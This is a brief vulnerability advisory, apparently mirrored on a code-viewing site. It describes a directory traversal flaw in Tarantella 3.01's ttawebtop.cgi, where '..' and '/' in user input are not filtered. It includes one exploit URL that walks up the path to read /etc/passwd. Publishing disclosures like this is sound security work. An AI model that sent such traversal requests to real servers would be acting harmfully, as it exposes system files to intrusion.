📄 ttawebtop.html
字号:
<html>
<body bgcolor="#000000" text="#CCCCCC">
<pre>
<b>Name</b> : tarantella 3.01 ttawebtop.cgi "show files" vulnerability
<b>Problem</b> : '..' and '/' are not filtered while processing
user input, so it is possible to enter arbitrary values
to retreive files from remote sever, which should not be
accessible normally.
<b>Exploit</b>:
http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=
../../../../../../../../../../../../../../../etc/passwd
<b>Author</b> : KF (dotslash@snosoft.com)
</pre>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -